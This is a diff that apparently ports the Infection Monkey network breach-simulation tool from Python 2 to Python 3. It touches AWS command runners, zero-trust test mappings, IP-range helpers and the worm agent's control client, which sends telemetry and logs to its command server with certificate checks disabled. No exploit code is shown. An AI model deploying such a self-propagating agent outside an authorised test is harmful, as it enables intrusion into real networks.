from aws_service import filter_instance_data_from_aws_response
|
||||
from .aws_service import filter_instance_data_from_aws_response
|
||||
|
||||
import json
|
||||
|
||||
|
||||
__author__ = 'shay.nehmad'
|
||||
|
||||
|
||||
|
@ -53,7 +52,7 @@ class TestFilterInstanceDataFromAwsResponse(TestCase):
|
|||
self.assertEqual(filter_instance_data_from_aws_response(json.loads(json_response_empty)), [])
|
||||
self.assertEqual(
|
||||
filter_instance_data_from_aws_response(json.loads(json_response_full)),
|
||||
[{'instance_id': u'string',
|
||||
'ip_address': u'string',
|
||||
'name': u'string',
|
||||
'os': u'string'}])
|
||||
[{'instance_id': 'string',
|
||||
'ip_address': 'string',
|
||||
'name': 'string',
|
||||
'os': 'string'}])
|
||||
|
|
|
@ -1,6 +1,5 @@
|
|||
from common.cmd.cmd_result import CmdResult
|
||||
|
||||
|
||||
__author__ = 'itay.mizeretz'
|
||||
|
||||
|
||||
|
@ -11,8 +10,8 @@ class AwsCmdResult(CmdResult):
|
|||
|
||||
def __init__(self, command_info):
|
||||
super(AwsCmdResult, self).__init__(
|
||||
self.is_successful(command_info, True), command_info[u'ResponseCode'], command_info[u'StandardOutputContent'],
|
||||
command_info[u'StandardErrorContent'])
|
||||
self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'],
|
||||
command_info['StandardErrorContent'])
|
||||
self.command_info = command_info
|
||||
|
||||
@staticmethod
|
||||
|
@ -23,4 +22,4 @@ class AwsCmdResult(CmdResult):
|
|||
:param is_timeout: Whether the given command timed out
|
||||
:return: True if successful, False otherwise.
|
||||
"""
|
||||
return (command_info[u'Status'] == u'Success') or (is_timeout and (command_info[u'Status'] == u'InProgress'))
|
||||
return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress'))
|
||||
|
|
|
@ -15,7 +15,7 @@ class AwsCmdRunner(CmdRunner):
|
|||
Class for running commands on a remote AWS machine
|
||||
"""
|
||||
|
||||
def __init__(self, is_linux, instance_id, region = None):
|
||||
def __init__(self, is_linux, instance_id, region=None):
|
||||
super(AwsCmdRunner, self).__init__(is_linux)
|
||||
self.instance_id = instance_id
|
||||
self.region = region
|
||||
|
@ -28,9 +28,9 @@ class AwsCmdRunner(CmdRunner):
|
|||
return AwsCmdResult(command_info)
|
||||
|
||||
def get_command_status(self, command_info):
|
||||
if command_info[u'Status'] == u'InProgress':
|
||||
if command_info['Status'] == 'InProgress':
|
||||
return CmdStatus.IN_PROGRESS
|
||||
elif command_info[u'Status'] == u'Success':
|
||||
elif command_info['Status'] == 'Success':
|
||||
return CmdStatus.SUCCESS
|
||||
else:
|
||||
return CmdStatus.FAILURE
|
||||
|
|
|
@ -61,7 +61,7 @@ class CmdRunner(object):
|
|||
command_instance_dict[command] = instance
|
||||
|
||||
instance_results = {}
|
||||
command_result_pairs = CmdRunner.wait_commands(command_instance_dict.keys())
|
||||
command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys()))
|
||||
for command, result in command_result_pairs:
|
||||
instance = command_instance_dict[command]
|
||||
instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result)
|
||||
|
|
|
@ -1,2 +1,3 @@
|
|||
from zero_trust_consts import populate_mappings
|
||||
from .zero_trust_consts import populate_mappings
|
||||
|
||||
populate_mappings()
|
||||
|
|
|
@ -1,2 +1 @@
|
|||
ES_SERVICE = 'elastic-search-9200'
|
||||
|
||||
|
|
|
@ -6,31 +6,31 @@ This file contains static mappings between zero trust components such as: pillar
|
|||
Some of the mappings are computed when this module is loaded.
|
||||
"""
|
||||
|
||||
AUTOMATION_ORCHESTRATION = u"Automation & Orchestration"
|
||||
VISIBILITY_ANALYTICS = u"Visibility & Analytics"
|
||||
WORKLOADS = u"Workloads"
|
||||
DEVICES = u"Devices"
|
||||
NETWORKS = u"Networks"
|
||||
PEOPLE = u"People"
|
||||
DATA = u"Data"
|
||||
AUTOMATION_ORCHESTRATION = "Automation & Orchestration"
|
||||
VISIBILITY_ANALYTICS = "Visibility & Analytics"
|
||||
WORKLOADS = "Workloads"
|
||||
DEVICES = "Devices"
|
||||
NETWORKS = "Networks"
|
||||
PEOPLE = "People"
|
||||
DATA = "Data"
|
||||
PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION)
|
||||
|
||||
STATUS_UNEXECUTED = u"Unexecuted"
|
||||
STATUS_PASSED = u"Passed"
|
||||
STATUS_VERIFY = u"Verify"
|
||||
STATUS_FAILED = u"Failed"
|
||||
STATUS_UNEXECUTED = "Unexecuted"
|
||||
STATUS_PASSED = "Passed"
|
||||
STATUS_VERIFY = "Verify"
|
||||
STATUS_FAILED = "Failed"
|
||||
# Don't change order! The statuses are ordered by importance/severity.
|
||||
ORDERED_TEST_STATUSES = [STATUS_FAILED, STATUS_VERIFY, STATUS_PASSED, STATUS_UNEXECUTED]
|
||||
|
||||
TEST_DATA_ENDPOINT_ELASTIC = u"unencrypted_data_endpoint_elastic"
|
||||
TEST_DATA_ENDPOINT_HTTP = u"unencrypted_data_endpoint_http"
|
||||
TEST_MACHINE_EXPLOITED = u"machine_exploited"
|
||||
TEST_ENDPOINT_SECURITY_EXISTS = u"endpoint_security_exists"
|
||||
TEST_SCHEDULED_EXECUTION = u"scheduled_execution"
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE = u"malicious_activity_timeline"
|
||||
TEST_SEGMENTATION = u"segmentation"
|
||||
TEST_TUNNELING = u"tunneling"
|
||||
TEST_COMMUNICATE_AS_NEW_USER = u"communicate_as_new_user"
|
||||
TEST_DATA_ENDPOINT_ELASTIC = "unencrypted_data_endpoint_elastic"
|
||||
TEST_DATA_ENDPOINT_HTTP = "unencrypted_data_endpoint_http"
|
||||
TEST_MACHINE_EXPLOITED = "machine_exploited"
|
||||
TEST_ENDPOINT_SECURITY_EXISTS = "endpoint_security_exists"
|
||||
TEST_SCHEDULED_EXECUTION = "scheduled_execution"
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE = "malicious_activity_timeline"
|
||||
TEST_SEGMENTATION = "segmentation"
|
||||
TEST_TUNNELING = "tunneling"
|
||||
TEST_COMMUNICATE_AS_NEW_USER = "communicate_as_new_user"
|
||||
TESTS = (
|
||||
TEST_SEGMENTATION,
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE,
|
||||
|
@ -43,32 +43,33 @@ TESTS = (
|
|||
TEST_COMMUNICATE_AS_NEW_USER
|
||||
)
|
||||
|
||||
PRINCIPLE_DATA_TRANSIT = u"data_transit"
|
||||
PRINCIPLE_ENDPOINT_SECURITY = u"endpoint_security"
|
||||
PRINCIPLE_USER_BEHAVIOUR = u"user_behaviour"
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = u"analyze_network_traffic"
|
||||
PRINCIPLE_SEGMENTATION = u"segmentation"
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = u"network_policies"
|
||||
PRINCIPLE_USERS_MAC_POLICIES = u"users_mac_policies"
|
||||
PRINCIPLE_DATA_TRANSIT = "data_transit"
|
||||
PRINCIPLE_ENDPOINT_SECURITY = "endpoint_security"
|
||||
PRINCIPLE_USER_BEHAVIOUR = "user_behaviour"
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC = "analyze_network_traffic"
|
||||
PRINCIPLE_SEGMENTATION = "segmentation"
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES = "network_policies"
|
||||
PRINCIPLE_USERS_MAC_POLICIES = "users_mac_policies"
|
||||
PRINCIPLES = {
|
||||
PRINCIPLE_SEGMENTATION: u"Apply segmentation and micro-segmentation inside your network.",
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: u"Analyze network traffic for malicious activity.",
|
||||
PRINCIPLE_USER_BEHAVIOUR: u"Adopt security user behavior analytics.",
|
||||
PRINCIPLE_ENDPOINT_SECURITY: u"Use anti-virus and other traditional endpoint security solutions.",
|
||||
PRINCIPLE_DATA_TRANSIT: u"Secure data at transit by encrypting it.",
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: u"Configure network policies to be as restrictive as possible.",
|
||||
PRINCIPLE_USERS_MAC_POLICIES: u"Users' permissions to the network and to resources should be MAC (Mandetory "
|
||||
u"Access Control) only.",
|
||||
PRINCIPLE_SEGMENTATION: "Apply segmentation and micro-segmentation inside your network.",
|
||||
PRINCIPLE_ANALYZE_NETWORK_TRAFFIC: "Analyze network traffic for malicious activity.",
|
||||
PRINCIPLE_USER_BEHAVIOUR: "Adopt security user behavior analytics.",
|
||||
PRINCIPLE_ENDPOINT_SECURITY: "Use anti-virus and other traditional endpoint security solutions.",
|
||||
PRINCIPLE_DATA_TRANSIT: "Secure data at transit by encrypting it.",
|
||||
PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.",
|
||||
PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandetory "
|
||||
"Access Control) only.",
|
||||
}
|
||||
|
||||
POSSIBLE_STATUSES_KEY = u"possible_statuses"
|
||||
PILLARS_KEY = u"pillars"
|
||||
PRINCIPLE_KEY = u"principle_key"
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY = u"finding_explanation"
|
||||
TEST_EXPLANATION_KEY = u"explanation"
|
||||
POSSIBLE_STATUSES_KEY = "possible_statuses"
|
||||
PILLARS_KEY = "pillars"
|
||||
PRINCIPLE_KEY = "principle_key"
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY = "finding_explanation"
|
||||
TEST_EXPLANATION_KEY = "explanation"
|
||||
TESTS_MAP = {
|
||||
TEST_SEGMENTATION: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tried to scan and find machines that it can communicate with from the machine it's running on, that belong to different network segments.",
|
||||
TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's "
|
||||
"running on, that belong to different network segments.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.",
|
||||
STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs."
|
||||
|
@ -78,7 +79,8 @@ TESTS_MAP = {
|
|||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED]
|
||||
},
|
||||
TEST_MALICIOUS_ACTIVITY_TIMELINE: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkeys in the network performed malicious-looking actions, like scanning and attempting exploitation.",
|
||||
TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting "
|
||||
"exploitation.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts."
|
||||
},
|
||||
|
@ -87,19 +89,22 @@ TESTS_MAP = {
|
|||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_ENDPOINT_SECURITY_EXISTS: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey checked if there is an active process of an endpoint security software.",
|
||||
TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus software on endpoints.",
|
||||
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a security concern."
|
||||
STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus "
|
||||
"software on endpoints.",
|
||||
STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a "
|
||||
"security concern. "
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||
PILLARS_KEY: [DEVICES],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
TEST_MACHINE_EXPLOITED: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tries to exploit machines in order to breach them and propagate in the network.",
|
||||
TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see which endpoints were compromised.",
|
||||
STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see "
|
||||
"which endpoints were compromised.",
|
||||
STATUS_PASSED: "Monkey didn't manage to exploit an endpoint."
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY,
|
||||
|
@ -109,7 +114,8 @@ TESTS_MAP = {
|
|||
TEST_SCHEDULED_EXECUTION: {
|
||||
TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security software.",
|
||||
STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security "
|
||||
"software.",
|
||||
STATUS_PASSED: "Monkey failed to execute in a scheduled manner."
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR,
|
||||
|
@ -117,38 +123,42 @@ TESTS_MAP = {
|
|||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY]
|
||||
},
|
||||
TEST_DATA_ENDPOINT_ELASTIC: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to ElasticSearch instances.",
|
||||
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.",
|
||||
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts that indicate attempts to access them."
|
||||
STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts "
|
||||
"that indicate attempts to access them. "
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||
PILLARS_KEY: [DATA],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
TEST_DATA_ENDPOINT_HTTP: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey scanned for unencrypted access to HTTP servers.",
|
||||
TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.",
|
||||
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate attempts to access them."
|
||||
STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate "
|
||||
"attempts to access them. "
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_DATA_TRANSIT,
|
||||
PILLARS_KEY: [DATA],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED]
|
||||
},
|
||||
TEST_TUNNELING: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tried to tunnel traffic using other monkeys.",
|
||||
TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - restrict them."
|
||||
STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - "
|
||||
"restrict them. "
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES,
|
||||
PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS],
|
||||
POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED]
|
||||
},
|
||||
TEST_COMMUNICATE_AS_NEW_USER: {
|
||||
TEST_EXPLANATION_KEY: u"The Monkey tried to create a new user and communicate with the internet from it.",
|
||||
TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.",
|
||||
FINDING_EXPLANATION_BY_STATUS_KEY: {
|
||||
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - restrict them to MAC only.",
|
||||
STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - "
|
||||
"restrict them to MAC only.",
|
||||
STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network."
|
||||
},
|
||||
PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES,
|
||||
|
@ -184,7 +194,7 @@ def populate_mappings():
|
|||
|
||||
def populate_pillars_to_tests():
|
||||
for pillar in PILLARS:
|
||||
for test, test_info in TESTS_MAP.items():
|
||||
for test, test_info in list(TESTS_MAP.items()):
|
||||
if pillar in test_info[PILLARS_KEY]:
|
||||
PILLARS_TO_TESTS[pillar].append(test)
|
||||
|
||||
|
@ -192,12 +202,12 @@ def populate_pillars_to_tests():
|
|||
def populate_principles_to_tests():
|
||||
for single_principle in PRINCIPLES:
|
||||
PRINCIPLES_TO_TESTS[single_principle] = []
|
||||
for test, test_info in TESTS_MAP.items():
|
||||
for test, test_info in list(TESTS_MAP.items()):
|
||||
PRINCIPLES_TO_TESTS[test_info[PRINCIPLE_KEY]].append(test)
|
||||
|
||||
|
||||
def populate_principles_to_pillars():
|
||||
for principle, principle_tests in PRINCIPLES_TO_TESTS.items():
|
||||
for principle, principle_tests in list(PRINCIPLES_TO_TESTS.items()):
|
||||
principles_pillars = set()
|
||||
for test in principle_tests:
|
||||
for pillar in TESTS_MAP[test][PILLARS_KEY]:
|
||||
|
|
|
@ -4,7 +4,6 @@ import struct
|
|||
from abc import ABCMeta, abstractmethod
|
||||
|
||||
import ipaddress
|
||||
from six import text_type
|
||||
import logging
|
||||
|
||||
__author__ = 'itamar'
|
||||
|
@ -12,9 +11,7 @@ __author__ = 'itamar'
|
|||
LOG = logging.getLogger(__name__)
|
||||
|
||||
|
||||
class NetworkRange(object):
|
||||
__metaclass__ = ABCMeta
|
||||
|
||||
class NetworkRange(object, metaclass=ABCMeta):
|
||||
def __init__(self, shuffle=True):
|
||||
self._shuffle = shuffle
|
||||
|
||||
|
@ -62,7 +59,7 @@ class NetworkRange(object):
|
|||
ips = address_str.split('-')
|
||||
try:
|
||||
ipaddress.ip_address(ips[0]) and ipaddress.ip_address(ips[1])
|
||||
except ValueError as e:
|
||||
except ValueError:
|
||||
return False
|
||||
return True
|
||||
return False
|
||||
|
@ -80,7 +77,7 @@ class CidrRange(NetworkRange):
|
|||
def __init__(self, cidr_range, shuffle=True):
|
||||
super(CidrRange, self).__init__(shuffle=shuffle)
|
||||
self._cidr_range = cidr_range.strip()
|
||||
self._ip_network = ipaddress.ip_network(text_type(self._cidr_range), strict=False)
|
||||
self._ip_network = ipaddress.ip_network(str(self._cidr_range), strict=False)
|
||||
|
||||
def __repr__(self):
|
||||
return "<CidrRange %s>" % (self._cidr_range,)
|
||||
|
@ -119,7 +116,7 @@ class IpRange(NetworkRange):
|
|||
return self._lower_end_ip_num <= self._ip_to_number(ip_address) <= self._higher_end_ip_num
|
||||
|
||||
def _get_range(self):
|
||||
return range(self._lower_end_ip_num, self._higher_end_ip_num + 1)
|
||||
return list(range(self._lower_end_ip_num, self._higher_end_ip_num + 1))
|
||||
|
||||
|
||||
class SingleIpRange(NetworkRange):
|
||||
|
@ -153,30 +150,26 @@ class SingleIpRange(NetworkRange):
|
|||
return self._ip_address
|
||||
|
||||
@staticmethod
|
||||
def string_to_host(string):
|
||||
def string_to_host(string_):
|
||||
"""
|
||||
Converts the string that user entered in "Scan IP/subnet list" to a tuple of domain name and ip
|
||||
:param string: String that was entered in "Scan IP/subnet list"
|
||||
:param string_: String that was entered in "Scan IP/subnet list"
|
||||
:return: A tuple in format (IP, domain_name). Eg. (192.168.55.1, www.google.com)
|
||||
"""
|
||||
# The most common use case is to enter ip/range into "Scan IP/subnet list"
|
||||
domain_name = ''
|
||||
|
||||
# Make sure to have unicode string
|
||||
user_input = string.decode('utf-8', 'ignore')
|
||||
|
||||
# Try casting user's input as IP
|
||||
try:
|
||||
ip = ipaddress.ip_address(user_input).exploded
|
||||
ip = ipaddress.ip_address(string_).exploded
|
||||
except ValueError:
|
||||
# Exception means that it's a domain name
|
||||
try:
|
||||
ip = socket.gethostbyname(string)
|
||||
domain_name = string
|
||||
ip = socket.gethostbyname(string_)
|
||||
domain_name = string_
|
||||
except socket.error:
|
||||
LOG.error("Your specified host: {} is not found as a domain name and"
|
||||
" it's not an IP address".format(string))
|
||||
return None, string
|
||||
# If a string was entered instead of IP we presume that it was domain name and translate it
|
||||
" it's not an IP address".format(string_))
|
||||
return None, string_
|
||||
# If a string_ was entered instead of IP we presume that it was domain name and translate it
|
||||
return ip, domain_name
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
from common.network.network_range import *
|
||||
from common.network.network_range import CidrRange
|
||||
from common.network.segmentation_utils import get_ip_in_src_and_not_in_dst
|
||||
from monkey_island.cc.testing.IslandTestCase import IslandTestCase
|
||||
|
||||
|
@ -11,20 +11,20 @@ class TestSegmentationUtils(IslandTestCase):
|
|||
|
||||
# IP not in both
|
||||
self.assertIsNone(get_ip_in_src_and_not_in_dst(
|
||||
[text_type("3.3.3.3"), text_type("4.4.4.4")], source, target
|
||||
["3.3.3.3", "4.4.4.4"], source, target
|
||||
))
|
||||
|
||||
# IP not in source, in target
|
||||
self.assertIsNone(get_ip_in_src_and_not_in_dst(
|
||||
[text_type("2.2.2.2")], source, target
|
||||
["2.2.2.2"], source, target
|
||||
))
|
||||
|
||||
# IP in source, not in target
|
||||
self.assertIsNotNone(get_ip_in_src_and_not_in_dst(
|
||||
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, target
|
||||
["8.8.8.8", "1.1.1.1"], source, target
|
||||
))
|
||||
|
||||
# IP in both subnets
|
||||
self.assertIsNone(get_ip_in_src_and_not_in_dst(
|
||||
[text_type("8.8.8.8"), text_type("1.1.1.1")], source, source
|
||||
["8.8.8.8", "1.1.1.1"], source, source
|
||||
))
|
||||
|
|
|
@ -1,10 +1,10 @@
|
|||
|
||||
|
||||
# abstract, static method decorator
|
||||
# noinspection PyPep8Naming
|
||||
class abstractstatic(staticmethod):
|
||||
__slots__ = ()
|
||||
|
||||
def __init__(self, function):
|
||||
super(abstractstatic, self).__init__(function)
|
||||
function.__isabstractmethod__ = True
|
||||
|
||||
__isabstractmethod__ = True
|
||||
|
|
|
@ -12,8 +12,8 @@ class MongoUtils:
|
|||
|
||||
@staticmethod
|
||||
def fix_obj_for_mongo(o):
|
||||
if type(o) == dict:
|
||||
return dict([(k, MongoUtils.fix_obj_for_mongo(v)) for k, v in o.iteritems()])
|
||||
if isinstance(o, dict):
|
||||
return dict([(k, MongoUtils.fix_obj_for_mongo(v)) for k, v in list(o.items())])
|
||||
|
||||
elif type(o) in (list, tuple):
|
||||
return [MongoUtils.fix_obj_for_mongo(i) for i in o]
|
||||
|
@ -21,7 +21,7 @@ class MongoUtils:
|
|||
elif type(o) in (int, float, bool):
|
||||
return o
|
||||
|
||||
elif type(o) in (str, unicode):
|
||||
elif isinstance(o, str):
|
||||
# mongo dosn't like unprintable chars, so we use repr :/
|
||||
return repr(o)
|
||||
|
||||
|
@ -80,4 +80,3 @@ class MongoUtils:
|
|||
continue
|
||||
|
||||
return row
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
import _winreg
|
||||
import winreg
|
||||
|
||||
from common.utils.mongo_utils import MongoUtils
|
||||
|
||||
|
@ -12,11 +12,11 @@ class RegUtils:
|
|||
pass
|
||||
|
||||
@staticmethod
|
||||
def get_reg_key(subkey_path, store=_winreg.HKEY_LOCAL_MACHINE):
|
||||
key = _winreg.ConnectRegistry(None, store)
|
||||
subkey = _winreg.OpenKey(key, subkey_path)
|
||||
def get_reg_key(subkey_path, store=winreg.HKEY_LOCAL_MACHINE):
|
||||
key = winreg.ConnectRegistry(None, store)
|
||||
subkey = winreg.OpenKey(key, subkey_path)
|
||||
|
||||
d = dict([_winreg.EnumValue(subkey, i)[:2] for i in xrange(_winreg.QueryInfoKey(subkey)[0])])
|
||||
d = dict([winreg.EnumValue(subkey, i)[:2] for i in range(winreg.QueryInfoKey(subkey)[0])])
|
||||
d = MongoUtils.fix_obj_for_mongo(d)
|
||||
|
||||
subkey.Close()
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
import wmi
|
||||
|
||||
from mongo_utils import MongoUtils
|
||||
from .mongo_utils import MongoUtils
|
||||
|
||||
__author__ = 'maor.rayzin'
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
import infection_monkey.main
|
||||
from infection_monkey.main import main
|
||||
|
||||
if "__main__" == __name__:
|
||||
infection_monkey.main.main()
|
||||
main()
|
||||
|
|
|
@ -25,7 +25,7 @@ class Configuration(object):
|
|||
exploit_import = importlib.import_module('infection_monkey.exploit')
|
||||
|
||||
unknown_items = []
|
||||
for key, value in formatted_data.items():
|
||||
for key, value in list(formatted_data.items()):
|
||||
if key.startswith('_'):
|
||||
continue
|
||||
if key in ["name", "id", "current_server"]:
|
||||
|
@ -74,7 +74,7 @@ class Configuration(object):
|
|||
|
||||
val_type = type(value)
|
||||
|
||||
if val_type is types.FunctionType or val_type is types.MethodType:
|
||||
if isinstance(val_type, types.FunctionType) or isinstance(val_type, types.MethodType):
|
||||
continue
|
||||
|
||||
if val_type in (type, ABCMeta):
|
||||
|
@ -287,7 +287,7 @@ class Configuration(object):
|
|||
:param sensitive_data: the data to hash.
|
||||
:return: the hashed data.
|
||||
"""
|
||||
password_hashed = hashlib.sha512(sensitive_data).hexdigest()
|
||||
password_hashed = hashlib.sha512(sensitive_data.encode()).hexdigest()
|
||||
return password_hashed
|
||||
|
||||
|
||||
|
|
|
@ -9,7 +9,7 @@ from requests.exceptions import ConnectionError
|
|||
import infection_monkey.monkeyfs as monkeyfs
|
||||
import infection_monkey.tunnel as tunnel
|
||||
from infection_monkey.config import WormConfiguration, GUID
|
||||
from infection_monkey.network.info import local_ips, check_internet_access, TIMEOUT
|
||||
from infection_monkey.network.info import local_ips, check_internet_access
|
||||
from infection_monkey.transport.http import HTTPConnectProxy
|
||||
from infection_monkey.transport.tcp import TcpProxy
|
||||
|
||||
|
@ -85,7 +85,7 @@ class ControlClient(object):
|
|||
|
||||
except ConnectionError as exc:
|
||||
current_server = ""
|
||||
LOG.warn("Error connecting to control server %s: %s", server, exc)
|
||||
LOG.warning("Error connecting to control server %s: %s", server, exc)
|
||||
|
||||
if current_server:
|
||||
return True
|
||||
|
@ -112,13 +112,13 @@ class ControlClient(object):
|
|||
monkey = {}
|
||||
if ControlClient.proxies:
|
||||
monkey['tunnel'] = ControlClient.proxies.get('https')
|
||||
reply = requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),
|
||||
requests.patch("https://%s/api/monkey/%s" % (WormConfiguration.current_server, GUID),
|
||||
data=json.dumps(monkey),
|
||||
headers={'content-type': 'application/json'},
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies)
|
||||
except Exception as exc:
|
||||
LOG.warn("Error connecting to control server %s: %s",
|
||||
LOG.warning("Error connecting to control server %s: %s",
|
||||
WormConfiguration.current_server, exc)
|
||||
return {}
|
||||
|
||||
|
@ -129,13 +129,13 @@ class ControlClient(object):
|
|||
return
|
||||
try:
|
||||
telemetry = {'monkey_guid': GUID, 'telem_category': telem_category, 'data': data}
|
||||
reply = requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),
|
||||
requests.post("https://%s/api/telemetry" % (WormConfiguration.current_server,),
|
||||
data=json.dumps(telemetry),
|
||||
headers={'content-type': 'application/json'},
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies)
|
||||
except Exception as exc:
|
||||
LOG.warn("Error connecting to control server %s: %s",
|
||||
LOG.warning("Error connecting to control server %s: %s",
|
||||
WormConfiguration.current_server, exc)
|
||||
|
||||
@staticmethod
|
||||
|
@ -144,13 +144,13 @@ class ControlClient(object):
|
|||
return
|
||||
try:
|
||||
telemetry = {'monkey_guid': GUID, 'log': json.dumps(log)}
|
||||
reply = requests.post("https://%s/api/log" % (WormConfiguration.current_server,),
|
||||
requests.post("https://%s/api/log" % (WormConfiguration.current_server,),
|
||||
data=json.dumps(telemetry),
|
||||
headers={'content-type': 'application/json'},
|
||||
verify=False,
|
||||
proxies=ControlClient.proxies)
|
||||
except Exception as exc:
|
||||
LOG.warn("Error connecting to control server %s: %s",
|
||||
LOG.warning("Error connecting to control server %s: %s",
|
||||
WormConfiguration.current_server, exc)
|
||||
|
||||
@staticmethod
|
||||
|
@ -163,7 +163,7 @@ class ControlClient(object):
|
|||
proxies=ControlClient.proxies)
|
||||
|
||||
except Exception as exc:
|
||||
LOG.warn("Error connecting to control server %s: %s",
|
||||
LOG.warning("Error connecting to control server %s: %s",
|
||||
WormConfiguration.current_server, exc)
|
||||
return
|
||||
|
||||
|
@ -191,7 +191,7 @@ class ControlClient(object):
|
|||
verify=False,
|
||||
proxies=ControlClient.proxies)
|
||||
except Exception as exc:
|
||||
